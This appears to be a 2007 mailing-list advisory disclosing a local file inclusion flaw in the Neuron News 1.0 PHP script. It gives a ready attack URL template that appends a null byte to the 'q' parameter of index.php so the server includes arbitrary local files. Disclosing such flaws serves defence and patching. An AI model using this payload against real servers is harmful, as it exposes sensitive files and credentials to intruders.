Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

xcms all version arbitrary code execution

2 vanilla XSS on Wordpress ‘wp-register.php’

From:	h3llcode_(at)_hotmail.it <h3llcode_(at)_hotmail.it>
Date:	24.09.2007
Subject:	Neuron News 1.0 Local file inclusion (index.php)

+++++++++++++++++++++++++++++++++++++++++++

Neuron News 1.0 Local File inclusion

+++++++++++++++++++++++++++++++++++++++++++

# Founded By Seph1roth
# http://blackroots.it

#Vulnerable Script Download:      http://downloads.localhost.be/scripts/neuronnews.zip

# Bug :

http://[TARGET]/[PATH]/index.php?q=[Local File]%00

#Risk: The attacker can include sensible local file.